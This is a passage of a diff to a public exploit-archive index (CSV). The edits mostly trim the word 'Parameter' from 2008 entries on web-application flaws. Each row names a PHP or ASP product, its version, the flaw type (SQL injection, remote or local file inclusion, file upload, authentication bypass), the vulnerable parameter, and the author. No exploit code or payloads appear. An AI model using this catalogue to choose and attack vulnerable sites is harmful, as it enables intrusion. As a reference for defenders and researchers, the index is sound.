Inclusions",2008-04-30,RoMaNcYxHaCkEr,php,webapps,0 +5527,platforms/php/webapps/5527.pl,"Joomla! Component Webhosting - 'catid' Blind SQL Injection",2008-05-01,cO2,php,webapps,0 5528,platforms/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps,0 5529,platforms/php/webapps/5529.txt,"Vlbook 1.21 - Cross-Site Scripting / Local File Inclusion",2008-05-01,"Khashayar Fereidani",php,webapps,0 5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b - SQL Injection",2008-05-02,InjEctOr5,php,webapps,0 @@ -19502,67 +19503,67 @@ id,file,description,date,author,platform,type,port 5535,platforms/php/webapps/5535.txt,"SmartBlog 1.3 - 'index.php' SQL Injection",2008-05-03,His0k4,php,webapps,0 5537,platforms/php/webapps/5537.txt,"phpDirectorySource 1.1 - Multiple SQL Injections",2008-05-03,InjEctOr5,php,webapps,0 5538,platforms/php/webapps/5538.txt,"Cplinks 1.03 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-05-04,InjEctOr5,php,webapps,0 -5539,platforms/php/webapps/5539.txt,"ScorpNews 1.0 - 'site' Parameter Remote File Inclusion",2008-05-04,Silver,php,webapps,0 -5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit 1.4.0 - 'ParentId' Parameter SQL Injection",2008-05-04,JosS,php,webapps,0 +5539,platforms/php/webapps/5539.txt,"ScorpNews 1.0 - 'site' Remote File Inclusion",2008-05-04,Silver,php,webapps,0 +5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit 1.4.0 - 'ParentId' SQL Injection",2008-05-04,JosS,php,webapps,0 5541,platforms/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia 0.2.0 - SQL Injection",2008-05-05,K-159,php,webapps,0 -5542,platforms/php/webapps/5542.txt,"Online Rental Property Script 4.5 - 'pid' Parameter SQL Injection",2008-05-05,K-159,php,webapps,0 -5543,platforms/php/webapps/5543.txt,"Anserv Auction XL - 'cat' Parameter SQL Injection",2008-05-05,K-159,php,webapps,0 -5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend 2.0 - 'file' Parameter Remote File Inclusion",2008-05-05,K-159,php,webapps,0 -5545,platforms/php/webapps/5545.txt,"Kmita Mail 3.0 - 'file' Parameter Remote File Inclusion",2008-05-05,K-159,php,webapps,0 -5546,platforms/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' Parameter SQL Injection",2008-05-05,K-159,php,webapps,0 -5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 - 'historymonth' Parameter SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps,0 +5542,platforms/php/webapps/5542.txt,"Online Rental Property Script 4.5 - 'pid' SQL Injection",2008-05-05,K-159,php,webapps,0 +5543,platforms/php/webapps/5543.txt,"Anserv Auction XL - 'cat' SQL Injection",2008-05-05,K-159,php,webapps,0 +5544,platforms/php/webapps/5544.txt,"Kmita Tellfriend 2.0 - 'file' Remote File Inclusion",2008-05-05,K-159,php,webapps,0 +5545,platforms/php/webapps/5545.txt,"Kmita Mail 3.0 - 'file' Remote File Inclusion",2008-05-05,K-159,php,webapps,0 +5546,platforms/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,php,webapps,0 +5548,platforms/php/webapps/5548.txt,"Miniweb 2.0 - 'historymonth' SQL Injection",2008-05-05,HaCkeR_EgY,php,webapps,0 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps,0 5550,platforms/php/webapps/5550.php,"DeluxeBB 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - 'search.php' SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0 -5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' Parameter SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 +5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' SQL Injection",2008-05-06,InjEctOr5,php,webapps,0 5553,platforms/asp/webapps/5553.txt,"FipsCMS 2.1 - 'print.asp' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 -5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - 'cat' Parameter SQL Injection",2008-05-07,cOndemned,php,webapps,0 -5555,platforms/php/webapps/5555.txt,"GameCMS Lite 1.0 - 'systemId' Parameter SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 -5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' Parameter SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 +5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - 'cat' SQL Injection",2008-05-07,cOndemned,php,webapps,0 +5555,platforms/php/webapps/5555.txt,"GameCMS Lite 1.0 - 'systemId' SQL Injection",2008-05-07,InjEctOr5,php,webapps,0 +5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0 5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0 5559,platforms/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0 -5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - 'artistId' Parameter SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 -5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - 'msg_image' Parameter SQL Injection",2008-05-08,The:Paradox,php,webapps,0 +5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - 'artistId' SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0 +5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - 'msg_image' SQL Injection",2008-05-08,The:Paradox,php,webapps,0 5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple SQL Injections",2008-05-08,U238,asp,webapps,0 -5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - 'tid' Parameter SQL Injection",2008-05-08,Saime,php,webapps,0 -5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 -5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - 'rep' Parameter Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 +5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - 'tid' SQL Injection",2008-05-08,Saime,php,webapps,0 +5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusions",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 +5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - 'rep' Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - 'del.php' Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0 5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - 'getfile.php' Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0 -5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - 'prodid' Parameter SQL Injection",2008-05-09,JosS,php,webapps,0 +5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - 'prodid' SQL Injection",2008-05-09,JosS,php,webapps,0 5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0 5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2008-05-09,tw8,php,webapps,0 5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - 'index.php' Local File Inclusion",2008-05-09,cOndemned,php,webapps,0 -5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - 'gid' Parameter SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 +5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - 'gid' SQL Injection",2008-05-09,Mr.SQL,php,webapps,0 5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 - SQL Injection",2008-05-10,His0k4,php,webapps,0 5582,platforms/php/webapps/5582.txt,"Ktools Photostore 3.5.2 - Multiple SQL Injections",2008-05-10,DNX,php,webapps,0 5583,platforms/php/webapps/5583.php,"Joomla! Component Datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0 -5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusion",2008-05-11,CraCkEr,php,webapps,0 +5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusions",2008-05-11,CraCkEr,php,webapps,0 5587,platforms/php/webapps/5587.pl,"Joomla! Component xsstream-dm 0.01b - SQL Injection",2008-05-11,Houssamix,php,webapps,0 5588,platforms/php/webapps/5588.php,"QuickUpCMS - Multiple SQL Injections Vulnerabilities",2008-05-11,Lidloses_Auge,php,webapps,0 -5589,platforms/php/webapps/5589.php,"Vortex CMS - 'pageid' Parameter Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0 +5589,platforms/php/webapps/5589.php,"Vortex CMS - 'pageid' Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0 5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - 'featured_article.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - 'category_list.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0 5595,platforms/php/webapps/5595.txt,"ClanLite 2.x - SQL Injection / Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0 -5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0 +5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusions",2008-05-12,BiNgZa,php,webapps,0 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0 -5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 +5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - 'fid' SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload",2008-05-12,EgiX,php,webapps,0 5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection",2008-05-12,Stack,php,webapps,0 5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0 5603,platforms/php/webapps/5603.txt,"EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0 -5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection",2008-05-13,Saime,php,webapps,0 +5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - 'rid' Blind SQL Injection",2008-05-13,Saime,php,webapps,0 5605,platforms/php/webapps/5605.txt,"e-107 Plugin ZoGo-Shop 1.16 Beta 13 - SQL Injection",2008-05-13,Cr@zy_King,php,webapps,0 5606,platforms/php/webapps/5606.txt,"Web Group Communication Center (WGCC) 1.0.3 - SQL Injection",2008-05-13,myvx,php,webapps,0 -5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection",2008-05-13,His0k4,php,webapps,0 +5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - 'langsel' SQL Injection",2008-05-13,His0k4,php,webapps,0 5608,platforms/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple SQL Injections",2008-05-13,U238,asp,webapps,0 -5609,platforms/php/webapps/5609.txt,"EMO Realty Manager - 'ida' Parameter SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 -5610,platforms/php/webapps/5610.txt,"The Real Estate Script - 'docID' Parameter SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 -5611,platforms/php/webapps/5611.txt,"Linkspile - 'cat_id' Parameter SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 +5609,platforms/php/webapps/5609.txt,"EMO Realty Manager - 'ida' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 +5610,platforms/php/webapps/5610.txt,"The Real Estate Script - 'docID' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 +5611,platforms/php/webapps/5611.txt,"Linkspile - 'cat_id' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0 5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - 'detail.php' SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0 @@ -19581,11 +19582,11 @@ id,file,description,date,author,platform,type,port 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps,0 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - SQL Injection",2008-05-16,JosS,asp,webapps,0 5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps,0 -5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection",2008-05-16,Stack,php,webapps,0 +5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - 'post_id' SQL Injection",2008-05-16,Stack,php,webapps,0 5636,platforms/php/webapps/5636.txt,"Zomplog 3.8.2 - 'force_download.php' File Disclosure",2008-05-16,Stack,php,webapps,0 -5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0 +5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - 'msnum' Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0 5638,platforms/php/webapps/5638.txt,"How2ASP.net WebBoard 4.1 - SQL Injection",2008-05-17,"CWH Underground",php,webapps,0 -5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - 'category' Parameter Blind SQL Injection",2008-05-17,His0k4,php,webapps,0 +5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - 'category' Blind SQL Injection",2008-05-17,His0k4,php,webapps,0 5640,platforms/php/webapps/5640.py,"Smeego 1.0 - 'Cookie lang' Local File Inclusion",2008-05-17,0in,php,webapps,0 5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro - Multiple SQL Injections",2008-05-18,dun,php,webapps,0 5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS 3.00.02 - Multiple SQL Injections",2008-05-18,dun,php,webapps,0 @@ -19604,64 +19605,64 @@ id,file,description,date,author,platform,type,port 5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - 'page.php' Local File Inclusion",2008-05-20,Stack,php,webapps,0 5656,platforms/php/webapps/5656.txt,"eCMS 0.4.2 - SQL Injection / Security Bypass",2008-05-20,"Virangar Security",php,webapps,0 5657,platforms/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery",2008-05-20,USH,php,webapps,0 -5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - 'comic_id' Parameter SQL Injection",2008-05-20,Niiub,php,webapps,0 +5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - 'comic_id' SQL Injection",2008-05-20,Niiub,php,webapps,0 5659,platforms/php/webapps/5659.txt,"MX-System 2.7.3 - 'index.php' SQL Injection",2008-05-20,cOndemned,php,webapps,0 -5660,platforms/php/webapps/5660.txt,"PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection",2008-05-20,InjEctOr5,php,webapps,0 -5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 - 'pageid' Parameter SQL Injection",2008-05-21,InjEctOr5,php,webapps,0 +5660,platforms/php/webapps/5660.txt,"PHP Jokesite 2.0 - 'cat_id' SQL Injection",2008-05-20,InjEctOr5,php,webapps,0 +5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 - 'pageid' SQL Injection",2008-05-21,InjEctOr5,php,webapps,0 5662,platforms/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 - Remote Command Execution",2008-05-21,DSecRG,cgi,webapps,0 5663,platforms/php/webapps/5663.txt,"6rbScript - 'news.php' SQL Injection",2008-05-21,"Hussin X",php,webapps,0 5664,platforms/php/webapps/5664.txt,"Weblosninger 4 - Cross-Site Scripting / SQL Injection",2008-05-21,Mr.SQL,php,webapps,0 5665,platforms/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection",2008-05-21,Mr.SQL,php,webapps,0 -5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0 +5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0 5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 - Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0 5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - 'install_mod.php' Local File Inclusion",2008-05-23,DSecRG,php,webapps,0 -5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection",2008-05-24,His0k4,php,webapps,0 +5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - 'idresa' SQL Injection",2008-05-24,His0k4,php,webapps,0 5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion",2008-05-24,Kacak,php,webapps,0 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0 5673,platforms/php/webapps/5673.txt,"Xomol CMS 1.2 - Login Bypass / Local File Inclusion",2008-05-25,DNX,php,webapps,0 5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin",2008-05-26,Stack,php,webapps,0 5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",php,webapps,0 -5676,platforms/php/webapps/5676.txt,"CMS MAXSITE 1.10 - 'category' Parameter SQL Injection",2008-05-26,Tesz,php,webapps,0 +5676,platforms/php/webapps/5676.txt,"CMS MAXSITE 1.10 - 'category' SQL Injection",2008-05-26,Tesz,php,webapps,0 5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - 'Search' SQL Injection",2008-05-27,The:Paradox,php,webapps,0 -5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0 +5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0 5680,platforms/php/webapps/5680.txt,"OtomiGen.x 2.2 - 'lang' Local File Inclusion",2008-05-27,Saime,php,webapps,0 5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple SQL Injections",2008-05-28,cOndemned,php,webapps,0 -5684,platforms/php/webapps/5684.txt,"Joomla! Component Artist - 'idgalery' Parameter SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0 -5685,platforms/php/webapps/5685.txt,"FlashBlog - 'articulo_id' Parameter SQL Injection",2008-05-28,HER0,php,webapps,0 +5684,platforms/php/webapps/5684.txt,"Joomla! Component Artist - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0 +5685,platforms/php/webapps/5685.txt,"FlashBlog - 'articulo_id' SQL Injection",2008-05-28,HER0,php,webapps,0 5688,platforms/php/webapps/5688.php,"SyntaxCMS 1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps,0 -5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' Parameter SQL Injection",2008-05-29,QTRinux,php,webapps,0 +5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 - 'pid' SQL Injection",2008-05-29,QTRinux,php,webapps,0 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 (Windows) - Local File Inclusion",2008-05-29,gmda,php,webapps,0 5691,platforms/php/webapps/5691.php,"CMS from Scratch 1.1.3 - 'FCKeditor' Arbitrary File Upload",2008-05-29,EgiX,php,webapps,0 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads 1.0 RC1 Beta - SQL Injection",2008-05-29,Houssamix,php,webapps,0 5693,platforms/php/webapps/5693.txt,"CMS from Scratch 1.1.3 - 'image.php' Directory Traversal",2008-05-29,Stack,php,webapps,0 5696,platforms/php/webapps/5696.pl,"phpBookingCalendar 10 d - SQL Injection",2008-05-29,Stack,php,webapps,0 5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - 'FCKeditor' Arbitrary File Upload",2008-05-29,Stack,php,webapps,0 -5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' Parameter SQL Injection",2008-05-30,K-159,php,webapps,0 +5698,platforms/php/webapps/5698.txt,"HiveMaker Professional 1.0.2 - 'cid' SQL Injection",2008-05-30,K-159,php,webapps,0 5699,platforms/php/webapps/5699.txt,"PsychoStats 2.3.3 - Multiple SQL Injections",2008-05-31,Mr.SQL,php,webapps,0 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload",2008-05-31,irk4z,php,webapps,0 -5701,platforms/php/webapps/5701.txt,"Social Site Generator 2.0 - 'sgc_id' Parameter SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0 +5701,platforms/php/webapps/5701.txt,"Social Site Generator 2.0 - 'sgc_id' SQL Injection",2008-05-31,"DeAr Ev!L",php,webapps,0 5702,platforms/php/webapps/5702.txt,"Azuresites CMS - Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 -5703,platforms/php/webapps/5703.txt,"PHP Visit Counter 0.4 - 'datespan' Parameter SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 -5704,platforms/php/webapps/5704.txt,"PassWiki 0.9.16 RC3 - 'site_id' Parameter Local File Inclusion",2008-05-31,mozi,php,webapps,0 -5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 - 'id' Parameter Blind SQL Injection",2008-05-31,JosS,asp,webapps,0 -5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'mid' Parameter SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 -5707,platforms/php/webapps/5707.txt,"Social Site Generator 2.0 - 'path' Parameter Remote File Inclusion",2008-05-31,vBmad,php,webapps,0 -5708,platforms/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' Parameter SQL Injection",2008-05-31,His0k4,php,webapps,0 -5710,platforms/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' Parameter SQL Injection",2008-05-31,Stack,php,webapps,0 +5703,platforms/php/webapps/5703.txt,"PHP Visit Counter 0.4 - 'datespan' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 +5704,platforms/php/webapps/5704.txt,"PassWiki 0.9.16 RC3 - 'site_id' Local File Inclusion",2008-05-31,mozi,php,webapps,0 +5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 - 'id' Blind SQL Injection",2008-05-31,JosS,asp,webapps,0 +5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0 +5707,platforms/php/webapps/5707.txt,"Social Site Generator 2.0 - 'path' Remote File Inclusion",2008-05-31,vBmad,php,webapps,0 +5708,platforms/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0 +5710,platforms/php/webapps/5710.pl,"Joomla! Component Bible Study 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0 -5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0 +5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' SQL Injection",2008-06-01,JosS,php,webapps,0 5714,platforms/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0 -5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0 +5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusions",2008-06-01,MK,php,webapps,0 5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting",2008-06-01,"CWH Underground",php,webapps,0 5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0 5719,platforms/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0 5721,platforms/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0 -5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion",2008-06-02,HaiHui,php,webapps,0 +5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusions",2008-06-02,HaiHui,php,webapps,0 5723,platforms/php/webapps/5723.txt,"Joomla! Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps,0 -5724,platforms/php/webapps/5724.txt,"PLog 1.0.6 - 'albumID' Parameter SQL Injection",2008-06-02,DreamTurk,php,webapps,0 +5724,platforms/php/webapps/5724.txt,"PLog 1.0.6 - 'albumID' SQL Injection",2008-06-02,DreamTurk,php,webapps,0 5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - SQL Injection / Cross-Site Scripting",2008-06-02,"CWH Underground",php,webapps,0 5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b - Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps,0 -5729,platforms/php/webapps/5729.txt,"Joomla! Component JoomRadio 1.0 - 'id' Parameter SQL Injection",2008-06-03,His0k4,php,webapps,0 +5729,platforms/php/webapps/5729.txt,"Joomla! Component JoomRadio 1.0 - 'id' SQL Injection",2008-06-03,His0k4,php,webapps,0 5730,platforms/php/webapps/5730.txt,"Joomla! Component iDoBlog b24 - SQL Injection",2008-06-03,His0k4,php,webapps,0 5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - 'comment.asp' SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0 5733,platforms/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 @@ -19669,14 +19670,14 @@ id,file,description,date,author,platform,type,port 5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script 1.0.1 - Code Execution",2008-06-03,JIKO,php,webapps,0 5737,platforms/php/webapps/5737.pl,"Joomla! Component Jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,php,webapps,0 5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting",2008-06-04,"CWH Underground",php,webapps,0 -5740,platforms/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - 'gbid' Parameter SQL Injection",2008-06-04,ZAMUT,php,webapps,0 +5740,platforms/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - 'gbid' SQL Injection",2008-06-04,ZAMUT,php,webapps,0 5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - SQL Injection / Cross-Site Scripting",2008-06-05,"CWH Underground",php,webapps,0 5743,platforms/php/webapps/5743.txt,"Joomla! Component SimpleShop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 -5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - 'css_str' Parameter SQL Injection",2008-06-05,MustLive,php,webapps,0 